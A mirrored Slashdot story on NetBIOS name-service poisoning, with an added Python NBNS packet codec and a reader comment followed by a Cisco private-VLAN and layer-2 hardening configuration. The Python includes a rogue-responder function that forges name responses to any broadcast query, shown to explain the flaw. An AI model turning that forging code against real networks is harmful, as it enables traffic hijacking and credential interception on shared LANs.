Slashdot Mirror


NetBIOS Design Allows Traffic Redirection

iago-vL writes "Security researchers at SkullSecurity have demonstrated how the NetBIOS protocol allows trivial hijacking due to its design, through the use of a tool called 'nbpoison' (in the package 'nbtool'). If a DNS lookup fails on Windows, the operating system will broadcast a NetBIOS lookup request that anybody can respond to. One vector of attack is against business workstations on an untrusted network, like a hotel; all DNS requests for internal resources can be redirected (Exchange, proxy, WPAD, etc). Other attack vectors are discussed in a related blog post. Although similar attacks exist against DHCP, ARP and many other LAN-based protocols, we all know that untrusted systems on a LAN means game over. NetBIOS poisoning is much quieter and less likely to break other things."
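The query/response exchange the submission describes, as an added example that is not part of the original post and not code from SkullSecurity's nbtool: a minimal codec for the NetBIOS Name Service (NBNS, UDP/137) written from RFC 1001/1002. The names, the transaction ID and the 10.0.0.66 address are constructed sample values. The point it makes in code is that a positive name query response carries nothing the responder has to prove: it only echoes the 16-bit transaction ID and the encoded name, both of which were in the broadcast, so any host on the segment can build an acceptable answer.

```python
"""Minimal NBNS (NetBIOS Name Service) codec, RFC 1001/1002.
Added illustration; not the nbtool/nbpoison source. Sample names and
addresses are constructed."""
from __future__ import annotations
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020            # NB resource record (name -> address)
QCLASS_IN = 0x0001
FLAGS_BCAST_QUERY = 0x0110   # R=0, OPCODE=0 (query), RD=1, B=1: what a B-node broadcasts
FLAGS_POS_RESPONSE = 0x8500  # R=1, OPCODE=0, AA=1, RD=1, RCODE=0: positive name query response
SUFFIX_WORKSTATION = 0x00    # 16th byte of the NetBIOS name; 0x20 = server service
SUFFIX_SERVER = 0x20
HEADER = struct.Struct("!HHHHHH")  # NAME_TRN_ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT


def encode_netbios_name(name: str, suffix: int = SUFFIX_WORKSTATION) -> bytes:
    """First-level encoding: pad to 15 chars, append the suffix byte, then write
    every byte as two nibbles offset by 'A' (0x41). 34 bytes on the wire."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    nibbles = bytearray()
    for b in raw:
        nibbles.append(0x41 + (b >> 4))
        nibbles.append(0x41 + (b & 0x0F))
    return b"\x20" + bytes(nibbles) + b"\x00"


def decode_netbios_name(buf: bytes, offset: int = 0) -> tuple[str, int]:
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    if buf[offset] != 0x20 or buf[offset + 33] != 0x00:
        raise ValueError("not a first-level encoded NetBIOS name")
    enc = buf[offset + 1:offset + 33]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(trn_id: int, name: str, suffix: int = SUFFIX_WORKSTATION) -> bytes:
    """What the resolver broadcasts to 255.255.255.255:137 after DNS fails."""
    return (HEADER.pack(trn_id, FLAGS_BCAST_QUERY, 1, 0, 0, 0)
            + encode_netbios_name(name, suffix)
            + struct.pack("!HH", QTYPE_NB, QCLASS_IN))


def parse_query(pkt: bytes) -> tuple[int, str, int]:
    trn_id, flags, qdcount, *_ = HEADER.unpack_from(pkt, 0)
    if flags & 0x8000 or (flags >> 11) & 0xF != 0 or qdcount != 1:
        raise ValueError("not a name query")
    name, suffix = decode_netbios_name(pkt, HEADER.size)
    qtype, qclass = struct.unpack_from("!HH", pkt, HEADER.size + 34)
    if (qtype, qclass) != (QTYPE_NB, QCLASS_IN):
        raise ValueError("unexpected question type/class")
    return trn_id, name, suffix


def build_positive_response(trn_id: int, name: str, suffix: int, ip: str,
                            ttl: int = 300000) -> bytes:
    """One answer RR: NB_FLAGS (0x0000 = unique name, B-node) + IPv4 address."""
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(ip)
    return (HEADER.pack(trn_id, FLAGS_POS_RESPONSE, 0, 1, 0, 0)
            + encode_netbios_name(name, suffix)
            + struct.pack("!HHIH", QTYPE_NB, QCLASS_IN, ttl, len(rdata))
            + rdata)


def parse_response(pkt: bytes) -> tuple[int, str, int, str]:
    trn_id, flags, _qd, ancount, *_ = HEADER.unpack_from(pkt, 0)
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a name query response")
    if flags & 0x000F:
        raise ValueError("negative response, RCODE=%d" % (flags & 0xF))
    name, suffix = decode_netbios_name(pkt, HEADER.size)
    off = HEADER.size + 34
    rtype, _rclass, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, off)
    off += 10
    if rtype != QTYPE_NB or rdlen != 6:
        raise ValueError("unexpected answer record")
    return trn_id, name, suffix, socket.inet_ntoa(pkt[off + 2:off + 6])


def answer_any_query(query: bytes, my_ip: str) -> bytes:
    """What a rogue responder does: it needs no knowledge of the real host,
    just the ID and name taken from the broadcast itself."""
    trn_id, name, suffix = parse_query(query)
    return build_positive_response(trn_id, name, suffix, my_ip)


def victim_accepts(query: bytes, response: bytes) -> bool:
    """Everything a resolver can check: transaction ID and name match.
    Both values were broadcast, so this is not authentication."""
    q_id, q_name, q_suffix = parse_query(query)
    r_id, r_name, r_suffix, _ip = parse_response(response)
    return (q_id, q_name, q_suffix) == (r_id, r_name, r_suffix)


def demo(lookup: str = "EXCHANGE", rogue_ip: str = "10.0.0.66") -> str:
    """Victim broadcasts, an arbitrary host answers, victim uses the answer."""
    query = build_query(0x1234, lookup, SUFFIX_SERVER)
    response = answer_any_query(query, rogue_ip)
    if not victim_accepts(query, response):
        raise RuntimeError("resolver rejected response")
    return parse_response(response)[3]   # the address the victim will now use
```

`build_query` produces exactly the 50-byte datagram a B-node sends; to watch the real thing, bind a UDP socket to port 137 on a lab segment and feed received datagrams to `parse_query`. Note that `victim_accepts` has nothing else it could check: NBNS has no signature, no shared secret, and the transaction ID is in the same broadcast the responder just received.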

1 of 68 comments

  1. Layer 2 Separation by Euzechius · Score: 5, Informative

    This attack would easily be prevented by the use of Private VLANs on your network. With PVLANs, clients connected to the LAN can only send Layer 2 frames to the default gateway and other pre-defined shared services such as printing, AD, mail, internet... Typically, Private VLANs are very handy in shared/public environments such as hotels or public desktops.

    How to configure PVLANs on a Cisco Cat 3750 switch:
    http://www.cisco.com/en/US/tech/tk389/tk814/technologies_configuration_example09186a008017acad.shtml

    Many other techniques are available to protect a L2 LAN environment:
    * DHCP snooping (DHCP trusted/untrusted ports)
    * Dynamic ARP inspection
    * IP Source Guard
    * Port security (stickies) and MAC acls
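The configuration the comment above outlines, as an added example that is not the commenter's own and not taken from the linked Cisco document: an IOS configuration for a Catalyst 3750 that puts client ports in an isolated private VLAN behind a promiscuous uplink, then layers on the other L2 protections listed. The VLAN numbers (100 primary, 101 isolated), interface numbers and the assumption that Gi1/0/1 is the uplink to the gateway and shared services are made up for the example; check the exact command set against the linked Cisco page for your IOS release.

```cisco
! PVLAN configuration requires VTP transparent mode on the 3750
vtp mode transparent
!
! Primary VLAN carries traffic to the promiscuous (uplink) port;
! the isolated secondary VLAN is where the client ports live.
vlan 100
 private-vlan primary
 private-vlan association 101
vlan 101
 private-vlan isolated
!
! Uplink to the gateway / AD / mail / print / internet: promiscuous,
! so it can reach every host in the isolated VLAN.
interface GigabitEthernet1/0/1
 switchport mode private-vlan promiscuous
 switchport private-vlan mapping 100 101
!
! Client ports: isolated hosts can only exchange frames with the
! promiscuous port, never with each other, so a NetBIOS broadcast
! from one guest never reaches another guest.
interface range GigabitEthernet1/0/2 - 24
 switchport mode private-vlan host
 switchport private-vlan host-association 100 101
!
! DHCP snooping and Dynamic ARP Inspection on the primary VLAN;
! only the uplink is trusted to source DHCP offers / ARP replies.
ip dhcp snooping
ip dhcp snooping vlan 100
ip arp inspection vlan 100
interface GigabitEthernet1/0/1
 ip dhcp snooping trust
 ip arp inspection trust
!
! IP Source Guard (uses the DHCP snooping binding table) and
! sticky port security on the client ports.
interface range GigabitEthernet1/0/2 - 24
 ip verify source
 switchport port-security
 switchport port-security mac-address sticky
```

Verify with `show vlan private-vlan`, `show ip dhcp snooping binding` and `show ip arp inspection vlan 100`. The isolation is what defeats the broadcast-based attack: an NBNS query from a client port is forwarded only toward the promiscuous port, so a rogue host on another isolated port never sees it and cannot answer it.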